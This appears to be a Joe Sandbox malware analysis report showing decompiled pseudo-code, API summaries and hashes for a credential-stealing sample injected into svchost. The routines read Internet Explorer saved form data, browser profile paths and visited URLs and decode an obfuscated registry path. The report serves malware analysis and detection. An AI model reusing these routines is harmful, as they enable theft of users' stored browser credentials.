                                                                                                                                        0x0bc01267
                                                                                                                                        0x0bc01269
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc01269
                                                                                                                                        0x0bc01245
                                                                                                                                        0x0bc01247
                                                                                                                                        0x0bc0124d
                                                                                                                                        0x0bc0124f
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc011bc
                                                                                                                                        0x0bc011c2
                                                                                                                                        0x0bc011c8
                                                                                                                                        0x0bc011ca
                                                                                                                                        0x0bc011d5
                                                                                                                                        0x0bc011d9
                                                                                                                                        0x0bc011df
                                                                                                                                        0x0bc011e1
                                                                                                                                        0x0bc011e7
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc011eb
                                                                                                                                        0x0bc011eb
                                                                                                                                        0x0bc011ed
                                                                                                                                        0x0bc011ed
                                                                                                                                        0x0bc011f0
                                                                                                                                        0x0bc011f6
                                                                                                                                        0x0bc011f9
                                                                                                                                        0x0bc011fa
                                                                                                                                        0x0bc011fc
                                                                                                                                        0x0bc011fc
                                                                                                                                        0x0bc01204
                                                                                                                                        0x0bc01204
                                                                                                                                        0x0bc011db
                                                                                                                                        0x0bc011db
                                                                                                                                        0x0bc011db
                                                                                                                                        0x0bc01206
                                                                                                                                        0x0bc0120c
                                                                                                                                        0x0bc01213
                                                                                                                                        0x0bc01217
                                                                                                                                        0x0bc01217
                                                                                                                                        0x0bc0121b
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc011c8

                                                                                                                                        APIs
                                                                                                                                        • WSAStartup.WS2_32(00000101,?), ref: 0BC01183
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,0000008C), ref: 0BC01190
                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,00000000,00000030), ref: 0BC0122F
                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0BC01245
                                                                                                                                        • GetHGlobalFromStream.OLE32(?,?), ref: 0BC012C4
                                                                                                                                        • GlobalLock.KERNEL32 ref: 0BC012E5
                                                                                                                                        • GlobalUnlock.KERNEL32(?), ref: 0BC01361
                                                                                                                                          • Part of subcall function 0BC08D51: LocalAlloc.KERNELBASE(00000040,?,0BC08E59), ref: 0BC08D57
                                                                                                                                        • Sleep.KERNEL32(00002EE0), ref: 0BC013E4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$Stream$AllocCreateLocal$FromLockSleepStartupUnlock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2557352088-0
                                                                                                                                        • Opcode ID: 460a0b16ac82c8c7f1245bca46fe7b9bce1ad4b23e7bc2ed571e016a80971f02
                                                                                                                                        • Instruction ID: f16a690f29ca53b84f21dc68e901550b1024aed9d7e5b94ec533e1cc3ed213b2
                                                                                                                                        • Opcode Fuzzy Hash: 460a0b16ac82c8c7f1245bca46fe7b9bce1ad4b23e7bc2ed571e016a80971f02
                                                                                                                                        • Instruction Fuzzy Hash: 8F813E71A222299FDF209F64CC85ADAB7B5BF06304F5845EAE249B7190DB709F80CF51
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.44%

                                                                                                                                        Function 0BC0689E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117registrymemoryUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                        			E0BC0689E(void* __edx, intOrPtr _a4, void* _a8, char* _a12, char* _a16, intOrPtr _a20) {
				intOrPtr _v12;
				void* _v16;
				char _v20;
				char _v24;
				void* _v28;
				long _t36;
				void* _t37;
				long _t39;
				char _t48;
				void* _t51;
				void* _t68;
				signed int _t76;
				void* _t78;

				_t68 = __edx;
				_t78 = (_t76 & 0xfffffff8) - 0x14;
				if(StrStrIA(_a12, _a16) != 0) {
					_t48 = E0BC08EBD(_a8, _a12, "PathToExe", 0); // executed
					_t78 = _t78 + 0xc;
					_v20 = _t48;
					if(_t48 != 0) {
						_t59 = E0BC0914B(_t48);
						if(_t49 != 0) {
							_t51 = E0BC091BE(0x1a);
							_t82 = _t51;
							if(_t51 != 0) {
								E0BC08F32(_t51, _a20);
								E0BC06713(_t68, _t82, _a4, _t53, _t59); // executed
								_t78 = _t78 + 0x14;
								E0BC08D3D(_t53);
							}
							E0BC08D3D(_t59);
						}
						E0BC08D3D(_v20);
					}
				}
				_v28 = LocalAlloc(0x40, 0x880);
				_t36 = RegOpenKeyA(_a8, _a12,  &_v16); // executed
				if(_t36 != 0) {
					L12:
					_t37 = E0BC08D3D(_v28); // executed
					return _t37;
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v24);
					_push(_v28);
					_v20 = 0;
					_push(0);
					while(1) {
						_v24 = 0x7ff;
						_t39 = RegEnumKeyExA(_v16, ??, ??, ??, ??, ??, ??, ??); // executed
						if(_t39 != 0) {
							break;
						}
						_v12 = E0BC08F32(E0BC08EE2("\\", _a12), _v28);
						E0BC0689E(_t68, _a4, _a8, _t42, _a16, _a20); // executed
						_t78 = _t78 + 0x1c;
						E0BC08D3D(_v12);
						_t24 =  &_v20;
						 *_t24 = _v20 + 1;
						__eflags =  *_t24;
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push( &_v24);
						_push(_v28);
						_push(_v20);
					}
					RegCloseKey(_v16); // executed
					goto L12;
				}
			}
















                                                                                                                                        0x0bc0689e
                                                                                                                                        0x0bc068a4
                                                                                                                                        0x0bc068ba
                                                                                                                                        0x0bc068c8
                                                                                                                                        0x0bc068cd
                                                                                                                                        0x0bc068d0
                                                                                                                                        0x0bc068d6
                                                                                                                                        0x0bc068de
                                                                                                                                        0x0bc068e3
                                                                                                                                        0x0bc068e7
                                                                                                                                        0x0bc068ed
                                                                                                                                        0x0bc068ef
                                                                                                                                        0x0bc068fa
                                                                                                                                        0x0bc06901
                                                                                                                                        0x0bc06906
                                                                                                                                        0x0bc0690a
                                                                                                                                        0x0bc0690f
                                                                                                                                        0x0bc06911
                                                                                                                                        0x0bc06916
                                                                                                                                        0x0bc0691b
                                                                                                                                        0x0bc06920
                                                                                                                                        0x0bc068d6
                                                                                                                                        0x0bc0692e
                                                                                                                                        0x0bc0693d
                                                                                                                                        0x0bc06945
                                                                                                                                        0x0bc069d2
                                                                                                                                        0x0bc069d6
                                                                                                                                        0x0bc069e2
                                                                                                                                        0x0bc0694b
                                                                                                                                        0x0bc06951
                                                                                                                                        0x0bc06952
                                                                                                                                        0x0bc06953
                                                                                                                                        0x0bc06954
                                                                                                                                        0x0bc06959
                                                                                                                                        0x0bc0695a
                                                                                                                                        0x0bc0695e
                                                                                                                                        0x0bc06967
                                                                                                                                        0x0bc069ba
                                                                                                                                        0x0bc069be
                                                                                                                                        0x0bc069c2
                                                                                                                                        0x0bc069c6
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc06985
                                                                                                                                        0x0bc06993
                                                                                                                                        0x0bc06998
                                                                                                                                        0x0bc0699f
                                                                                                                                        0x0bc069a4
                                                                                                                                        0x0bc069a4
                                                                                                                                        0x0bc069a4
                                                                                                                                        0x0bc069a9
                                                                                                                                        0x0bc069aa
                                                                                                                                        0x0bc069ab
                                                                                                                                        0x0bc069ac
                                                                                                                                        0x0bc069b1
                                                                                                                                        0x0bc069b2
                                                                                                                                        0x0bc069b6
                                                                                                                                        0x0bc069b6
                                                                                                                                        0x0bc069cc
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc069cc

                                                                                                                                        APIs
                                                                                                                                        • StrStrIA.SHLWAPI(?,?), ref: 0BC068B0
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000880), ref: 0BC06928
                                                                                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0BC0693D
                                                                                                                                        • RegEnumKeyExA.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0BC069C2
                                                                                                                                        • RegCloseKey.KERNELBASE(?), ref: 0BC069CC
                                                                                                                                          • Part of subcall function 0BC0914B: lstrlenA.KERNEL32(0BC068DE,00000000,?,?,?,0BC068DE,00000000), ref: 0BC0916A
                                                                                                                                          • Part of subcall function 0BC0914B: StrStrIA.SHLWAPI(00000000,.exe,?,?,?,0BC068DE,00000000), ref: 0BC0918A
                                                                                                                                          • Part of subcall function 0BC0914B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,?,?,?,0BC068DE,00000000), ref: 0BC0919D
                                                                                                                                          • Part of subcall function 0BC0914B: lstrlenA.KERNEL32(00000000,?,?,?,0BC068DE,00000000), ref: 0BC091AE
                                                                                                                                          • Part of subcall function 0BC091BE: LocalAlloc.KERNEL32(00000040,00000185,?,?,0BC02182,?), ref: 0BC091C9
                                                                                                                                          • Part of subcall function 0BC091BE: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,00000000,?,?,0BC02182,?), ref: 0BC091DA
                                                                                                                                          • Part of subcall function 0BC08F32: lstrlenA.KERNEL32(00000000,HWID,?,?,?,0BC09A43), ref: 0BC08F58
                                                                                                                                          • Part of subcall function 0BC08F32: lstrlenA.KERNEL32(00000000,?,0BC09A43), ref: 0BC08F5F
                                                                                                                                          • Part of subcall function 0BC08F32: lstrcpyA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F70
                                                                                                                                          • Part of subcall function 0BC08F32: lstrcatA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F7A
                                                                                                                                          • Part of subcall function 0BC06713: LocalAlloc.KERNEL32(00000040,00000000), ref: 0BC06777
                                                                                                                                          • Part of subcall function 0BC06713: LocalAlloc.KERNEL32(00000040,00001080), ref: 0BC06785
                                                                                                                                          • Part of subcall function 0BC06713: GetPrivateProfileSectionNamesA.KERNEL32 ref: 0BC067A2
                                                                                                                                          • Part of subcall function 0BC06713: StrStrIA.SHLWAPI(00000000,Profile), ref: 0BC067C2
                                                                                                                                          • Part of subcall function 0BC06713: GetPrivateProfileStringA.KERNEL32(00000000,Path,0BC0D832,00000000,00000FFF,?), ref: 0BC067E4
                                                                                                                                          • Part of subcall function 0BC06713: GetPrivateProfileIntA.KERNEL32 ref: 0BC067F9
                                                                                                                                          • Part of subcall function 0BC06713: lstrlenA.KERNEL32(00000000), ref: 0BC06852
                                                                                                                                          • Part of subcall function 0BC08D3D: LocalFree.KERNELBASE(00000000,?,0BC08E77,?), ref: 0BC08D49
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Locallstrlen$Alloc$PrivateProfile$CloseEnumFolderFreeNamesOpenPathSectionStringlstrcatlstrcpy
                                                                                                                                        • String ID: PathToExe
                                                                                                                                        • API String ID: 4124449509-1982016430
                                                                                                                                        • Opcode ID: 5bf0cb48004fd6f865b04010372cf64a9541a5146cfd492789393de75e961b9d
                                                                                                                                        • Instruction ID: 991c5fbaeedf826f1d0af9ab6c45de8c888106bbb348f22a7b2e8e01520bea13
                                                                                                                                        • Opcode Fuzzy Hash: 5bf0cb48004fd6f865b04010372cf64a9541a5146cfd492789393de75e961b9d
                                                                                                                                        • Instruction Fuzzy Hash: 59318D72538205BFDB016F64DC05C6B7FA9FF88650F108A29FA54950A0EE31CA20ABA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 0BC0509B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87comUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 45%
                                                                                                                                        			E0BC0509B(intOrPtr _a4) {
				void* _v12;
				void* _v16;
				void* _v20;
				WCHAR* _v52;
				WCHAR* _v56;
				char _v60;
				void* __esi;
				char* _t27;
				void* _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t33;
				intOrPtr* _t35;
				WCHAR* _t37;
				intOrPtr* _t53;

				_t27 =  &_v20;
				__imp__CoCreateInstance(0xbc0c1e0, 0, 0x15, 0xbc0c1f0, _t27); // executed
				if(_t27 < 0) {
					L14:
					_t28 = E0BC04E17(_t51, L"http://www.facebook.com/", __eflags, _a4, 0); // executed
					return _t28;
				}
				_t29 = _v20;
				_t51 =  &_v12;
				_push( &_v12);
				_push(_t29);
				if( *((intOrPtr*)( *_t29 + 0x1c))() < 0 || _v12 == 0) {
					L13:
					_t31 = _v20;
					 *((intOrPtr*)( *_t31 + 8))(_t31);
					goto L14;
				} else {
					_t53 = __imp__CoTaskMemFree;
					_v56 = 0;
					_v52 = 0;
					_v60 = 0x28;
					while(1) {
						_t33 = _v12;
						_push( &_v16);
						_t51 =  &_v60;
						_push( &_v60);
						_push(1);
						_v16 = 0;
						_push(_t33); // executed
						if( *((intOrPtr*)( *_t33 + 0xc))() != 0 || _v16 != 1) {
							break;
						}
						if(_v56 != 0) {
							_t37 = StrStrIW(_v56, "?");
							_t62 = _t37;
							if(_t37 == 0) {
								_t37 = 0;
								__eflags = 0;
							} else {
								 *_t37 = 0;
							}
							E0BC04E17(_t51, _v56, _t62, _a4, _t37); // executed
							 *_t53(_v56);
							if(_v52 != 0) {
								 *_t53(_v52);
							}
						}
					}
					_t35 = _v12;
					 *((intOrPtr*)( *_t35 + 8))(_t35);
					goto L13;
				}
			}


















                                                                                                                                        0x0bc050a4
                                                                                                                                        0x0bc050b7
                                                                                                                                        0x0bc050bf
                                                                                                                                        0x0bc05163
                                                                                                                                        0x0bc0516c
                                                                                                                                        0x0bc05177
                                                                                                                                        0x0bc05177
                                                                                                                                        0x0bc050c5
                                                                                                                                        0x0bc050ca
                                                                                                                                        0x0bc050cd
                                                                                                                                        0x0bc050ce
                                                                                                                                        0x0bc050d4
                                                                                                                                        0x0bc0515a
                                                                                                                                        0x0bc0515a
                                                                                                                                        0x0bc05160
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc050df
                                                                                                                                        0x0bc050df
                                                                                                                                        0x0bc050e5
                                                                                                                                        0x0bc050e8
                                                                                                                                        0x0bc050eb
                                                                                                                                        0x0bc050f2
                                                                                                                                        0x0bc050f2
                                                                                                                                        0x0bc050f8
                                                                                                                                        0x0bc050f9
                                                                                                                                        0x0bc050fc
                                                                                                                                        0x0bc050fd
                                                                                                                                        0x0bc050ff
                                                                                                                                        0x0bc05104
                                                                                                                                        0x0bc0510a
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc05115
                                                                                                                                        0x0bc0511f
                                                                                                                                        0x0bc05125
                                                                                                                                        0x0bc05127
                                                                                                                                        0x0bc05130
                                                                                                                                        0x0bc05130
                                                                                                                                        0x0bc05129
                                                                                                                                        0x0bc0512b
                                                                                                                                        0x0bc0512b
                                                                                                                                        0x0bc05139
                                                                                                                                        0x0bc05143
                                                                                                                                        0x0bc05148
                                                                                                                                        0x0bc0514d
                                                                                                                                        0x0bc0514d
                                                                                                                                        0x0bc05148
                                                                                                                                        0x0bc05115
                                                                                                                                        0x0bc05151
                                                                                                                                        0x0bc05157
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc05157

                                                                                                                                        APIs
                                                                                                                                        • CoCreateInstance.OLE32(0BC0C1E0,00000000,00000015,0BC0C1F0,?), ref: 0BC050B7
                                                                                                                                        • StrStrIW.SHLWAPI(?,0BC0D72C), ref: 0BC0511F
                                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 0BC05143
                                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 0BC0514D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeTask$CreateInstance
                                                                                                                                        • String ID: ($http://www.facebook.com/
                                                                                                                                        • API String ID: 2903366249-3677894361
                                                                                                                                        • Opcode ID: 383ea2a17596b780223de14db633a8604017054f35dc1742f2e5cbce355e105b
                                                                                                                                        • Instruction ID: c807bb11b329e4628daca6c599042251ebad5a074d7dde13ad85a8fa200e5a82
                                                                                                                                        • Opcode Fuzzy Hash: 383ea2a17596b780223de14db633a8604017054f35dc1742f2e5cbce355e105b
                                                                                                                                        • Instruction Fuzzy Hash: E5314876A20219EFDF009FE4DCC59AEBBB9FF44745F108469F501A7290DA719A41CF10
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 0BC04E17, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 110stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                        			E0BC04E17(void* __edx, WCHAR* __esi, void* __eflags, intOrPtr _a4, short* _a8) {
				signed int _v8;
				char _v76;
				char _v80;
				char* _v84;
				signed int _v88;
				char _v92;
				char* _v96;
				short* _v100;
				intOrPtr _v104;
				WCHAR* _v108;
				char _v112;
				intOrPtr _v116;
				char _v120;
				void* __ebx;
				void* __edi;
				signed int _t39;
				intOrPtr _t52;
				int _t56;
				short* _t63;
				char* _t69;
				void* _t70;
				void* _t77;
				char* _t79;
				WCHAR* _t80;
				signed int _t81;
				void* _t82;
				void* _t83;

				_t80 = __esi;
				_t77 = __edx;
				_t39 =  *0xbc10000; // 0xbb40e64e
				_v8 = _t39 ^ _t81;
				_v104 = _a4;
				_v100 = _a8;
				_t79 = E0BC088C9("6ulekscV\\JbDggHg\\Xv3Db 6HRRLQ5g\\6v2R9DpH\\TL3pvgv2R\\kLQEv9g\\JAppHQRaHpgLvQ\\s44JvQRDLQHp\\6RvpD5H\\OL3pvgv2R.OL3pvgv2RHE5HCi9HrwfdEiff9H\\TL3pvgv2RVE5H\\1QRHbbLlvpOg\\lvpOoDRD");
				_v96 = _t79;
				_v84 = _t79;
				if(_t79 == 0) {
					_v84 = " ";
				}
				_t70 = lstrlenW;
				if(lstrlenW(_t80) + _t44 + 2 != 0) {
					E0BC08D5E( &_v76,  &_v76, 0, 0x40);
					E0BC04F4F(_t80, _t77,  &_v76);
					_t52 = E0BC08DDA(_t80,  *0xbc10010, "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2",  &_v76,  &_v80, 0); // executed
					_t79 = _t52;
					_t83 = _t82 + 0x18;
					if(_t79 != 0) {
						L6:
						if(_v80 != 0) {
							_t56 = lstrlenW(_t80);
							_v88 = _v88 & 0x00000000;
							_v112 = _t56 + _t56 + 2;
							_v120 = _v80;
							_v108 = _t80;
							_v116 = _t79;
							if(E0BC01000( &_v120,  &_v112,  &_v92) != 0 && _v88 != 0) {
								_t63 = _v100;
								if(_t63 != 0) {
									 *_t63 = "?";
								}
								E0BC04B07(_v104, _t80, _v88, _v92);
								LocalFree(_v88);
							}
						}
						E0BC08D3D(_t79);
						L13:
						_push(_v96);
						goto L14;
					}
					_t69 = E0BC08DDA(_t80,  *0xbc10010, _v84,  &_v76,  &_v80, _t52); // executed
					_t79 = _t69;
					_t83 = _t83 + 0x14;
					if(_t79 == 0) {
						goto L13;
					}
					goto L6;
				} else {
					_push(_t79);
					L14:
					return E0BC09FDC(LocalFree(), _t70, _v8 ^ _t81, _t77, _t79, _t80);
				}
			}






























                                                                                                                                        0x0bc04e17
                                                                                                                                        0x0bc04e17
                                                                                                                                        0x0bc04e1d
                                                                                                                                        0x0bc04e24
                                                                                                                                        0x0bc04e2b
                                                                                                                                        0x0bc04e37
                                                                                                                                        0x0bc04e3f
                                                                                                                                        0x0bc04e41
                                                                                                                                        0x0bc04e44
                                                                                                                                        0x0bc04e49
                                                                                                                                        0x0bc04e4b
                                                                                                                                        0x0bc04e4b
                                                                                                                                        0x0bc04e52
                                                                                                                                        0x0bc04e61
                                                                                                                                        0x0bc04e71
                                                                                                                                        0x0bc04e7c
                                                                                                                                        0x0bc04e96
                                                                                                                                        0x0bc04e9b
                                                                                                                                        0x0bc04e9d
                                                                                                                                        0x0bc04ea2
                                                                                                                                        0x0bc04ec4
                                                                                                                                        0x0bc04ec8
                                                                                                                                        0x0bc04ecb
                                                                                                                                        0x0bc04ecd
                                                                                                                                        0x0bc04ed5
                                                                                                                                        0x0bc04edb
                                                                                                                                        0x0bc04eea
                                                                                                                                        0x0bc04eed
                                                                                                                                        0x0bc04efa
                                                                                                                                        0x0bc04f02
                                                                                                                                        0x0bc04f07
                                                                                                                                        0x0bc04f0e
                                                                                                                                        0x0bc04f0e
                                                                                                                                        0x0bc04f20
                                                                                                                                        0x0bc04f2b
                                                                                                                                        0x0bc04f2b
                                                                                                                                        0x0bc04efa
                                                                                                                                        0x0bc04f32
                                                                                                                                        0x0bc04f38
                                                                                                                                        0x0bc04f38
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc04f38
                                                                                                                                        0x0bc04eb6
                                                                                                                                        0x0bc04ebb
                                                                                                                                        0x0bc04ebd
                                                                                                                                        0x0bc04ec2
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc04e63
                                                                                                                                        0x0bc04e63
                                                                                                                                        0x0bc04f3b
                                                                                                                                        0x0bc04f4e
                                                                                                                                        0x0bc04f4e

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC088C9: lstrlenA.KERNEL32(6ulekscV\JbDggHg\Xv3Db 6HRRLQ5g\6v2R9DpH\TL3pvgv2R\kLQEv9g\JAppHQRaHpgLvQ\s44JvQRDLQHp\6RvpD5H\OL3pvgv2R.OL3pvgv2RHE5HCi9HrwfdEiff9H\TL3pvgv2RVE5H\1QRHbbLlvpOg\lvpOoDRD), ref: 0BC0894B
                                                                                                                                          • Part of subcall function 0BC088C9: LocalAlloc.KERNEL32(00000040,-00000004), ref: 0BC08957
                                                                                                                                          • Part of subcall function 0BC088C9: lstrcpyA.KERNEL32(00000000,6ulekscV\JbDggHg\Xv3Db 6HRRLQ5g\6v2R9DpH\TL3pvgv2R\kLQEv9g\JAppHQRaHpgLvQ\s44JvQRDLQHp\6RvpD5H\OL3pvgv2R.OL3pvgv2RHE5HCi9HrwfdEiff9H\TL3pvgv2RVE5H\1QRHbbLlvpOg\lvpOoDRD), ref: 0BC08961
                                                                                                                                        • lstrlenW.KERNEL32 ref: 0BC04E59
                                                                                                                                        • LocalFree.KERNEL32(?,?,00000000,00000040), ref: 0BC04F3B
                                                                                                                                          • Part of subcall function 0BC04F4F: lstrlenW.KERNEL32(?,00000000,?,74F469A0), ref: 0BC04F71
                                                                                                                                          • Part of subcall function 0BC04F4F: wsprintfA.USER32 ref: 0BC0503F
                                                                                                                                          • Part of subcall function 0BC04F4F: lstrcpyA.KERNEL32(?,?), ref: 0BC05051
                                                                                                                                          • Part of subcall function 0BC04F4F: wsprintfA.USER32 ref: 0BC05078
                                                                                                                                          • Part of subcall function 0BC04F4F: lstrcpyA.KERNEL32(?,?), ref: 0BC0508A
                                                                                                                                          • Part of subcall function 0BC08DDA: RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?,HWID,?,HWID,?,?), ref: 0BC08E1A
                                                                                                                                          • Part of subcall function 0BC08DDA: RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000), ref: 0BC08E3B
                                                                                                                                          • Part of subcall function 0BC08DDA: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?), ref: 0BC08E69
                                                                                                                                          • Part of subcall function 0BC08DDA: RegCloseKey.KERNELBASE(?), ref: 0BC08E8C
                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000000,00000040), ref: 0BC04ECB
                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00000040), ref: 0BC04F2B
                                                                                                                                        Strings
                                                                                                                                        • 6ulekscV\JbDggHg\Xv3Db 6HRRLQ5g\6v2R9DpH\TL3pvgv2R\kLQEv9g\JAppHQRaHpgLvQ\s44JvQRDLQHp\6RvpD5H\OL3pvgv2R.OL3pvgv2RHE5HCi9HrwfdEiff9H\TL3pvgv2RVE5H\1QRHbbLlvpOg\lvpOoDRD, xrefs: 0BC04E32
                                                                                                                                        • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0BC04E8B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$Locallstrcpy$FreeQueryValuewsprintf$AllocCloseOpen
                                                                                                                                        • String ID: 6ulekscV\JbDggHg\Xv3Db 6HRRLQ5g\6v2R9DpH\TL3pvgv2R\kLQEv9g\JAppHQRaHpgLvQ\s44JvQRDLQHp\6RvpD5H\OL3pvgv2R.OL3pvgv2RHE5HCi9HrwfdEiff9H\TL3pvgv2RVE5H\1QRHbbLlvpOg\lvpOoDRD$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                                                                                                        • API String ID: 3202864287-1265371777
                                                                                                                                        • Opcode ID: 476e2ceca82c10ed8769472db2478b20d1fbea6b7c5f472f94a05d32e32a9c86
                                                                                                                                        • Instruction ID: c4470f76749939fc406a64f556f456e5db7058246c2dfa0166ce647b2181e5ae
                                                                                                                                        • Opcode Fuzzy Hash: 476e2ceca82c10ed8769472db2478b20d1fbea6b7c5f472f94a05d32e32a9c86
                                                                                                                                        • Instruction Fuzzy Hash: 7B412572D21208AFCB05DBE4C841ADEBBF9AF48340F10412AE615EB294EF749A05DB60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.34%

                                                                                                                                        Function 0BC08DDA, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93registryUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                        			E0BC08DDA(void* __esi, void* _a4, char* _a8, char* _a12, intOrPtr* _a16, int _a20) {
				int* _v8;
				void* _v12;
				int _v16;
				intOrPtr* _t29;
				int _t30;
				long _t31;
				int* _t33;
				long _t36;
				int _t38;
				char* _t40;
				long _t41;
				intOrPtr* _t42;
				int _t44;
				void* _t51;

				_t51 = __esi;
				_t29 = _a16;
				_v8 = 0;
				if(_t29 != 0) {
					 *_t29 = 0;
				}
				_t44 = _a20;
				_t30 = 0x20019;
				if(_t44 != 1) {
					if(_t44 == 2) {
						_t30 = 0x20119;
					}
				} else {
					_t30 = 0x20219;
				}
				_t31 = RegOpenKeyExA(_a4, _a8, 0, _t30,  &_v12); // executed
				if(_t31 != 0) {
					L16:
					if(_t44 < 2) {
						_t33 = E0BC08DDA(_t51, _a4, _a8, _a12, _a16, _t44 + 1); // executed
						_v8 = _t33;
					}
					L18:
					return _v8;
				}
				_push(_t51);
				_t36 = RegQueryValueExA(_v12, _a12, 0,  &_v16, 0,  &_a20); // executed
				if(_t36 == 0) {
					_t38 = _a20;
					if(_t38 != 0 && (_v16 != 1 || _t38 != 1)) {
						_t40 = E0BC08D51(_t38 + 1);
						_v8 = _t40;
						_t41 = RegQueryValueExA(_v12, _a12, 0, 0, _t40,  &_a20); // executed
						if(_t41 == 0) {
							_t42 = _a16;
							if(_t42 != 0) {
								 *_t42 = _a20;
							}
						} else {
							E0BC08D3D(_v8);
							_v8 = 0;
						}
					}
				}
				RegCloseKey(_v12); // executed
				_pop(_t51);
				if(_v8 != 0) {
					goto L18;
				} else {
					goto L16;
				}
			}

















                                                                                                                                        0x0bc08dda
                                                                                                                                        0x0bc08de0
                                                                                                                                        0x0bc08de7
                                                                                                                                        0x0bc08dec
                                                                                                                                        0x0bc08dee
                                                                                                                                        0x0bc08dee
                                                                                                                                        0x0bc08df0
                                                                                                                                        0x0bc08df3
                                                                                                                                        0x0bc08dfb
                                                                                                                                        0x0bc08e07
                                                                                                                                        0x0bc08e09
                                                                                                                                        0x0bc08e09
                                                                                                                                        0x0bc08dfd
                                                                                                                                        0x0bc08dfd
                                                                                                                                        0x0bc08dfd
                                                                                                                                        0x0bc08e1a
                                                                                                                                        0x0bc08e22
                                                                                                                                        0x0bc08e98
                                                                                                                                        0x0bc08e9b
                                                                                                                                        0x0bc08eab
                                                                                                                                        0x0bc08eb3
                                                                                                                                        0x0bc08eb3
                                                                                                                                        0x0bc08eb6
                                                                                                                                        0x0bc08ebc
                                                                                                                                        0x0bc08ebc
                                                                                                                                        0x0bc08e24
                                                                                                                                        0x0bc08e3b
                                                                                                                                        0x0bc08e3f
                                                                                                                                        0x0bc08e41
                                                                                                                                        0x0bc08e46
                                                                                                                                        0x0bc08e54
                                                                                                                                        0x0bc08e63
                                                                                                                                        0x0bc08e69
                                                                                                                                        0x0bc08e6d
                                                                                                                                        0x0bc08e7d
                                                                                                                                        0x0bc08e82
                                                                                                                                        0x0bc08e87
                                                                                                                                        0x0bc08e87
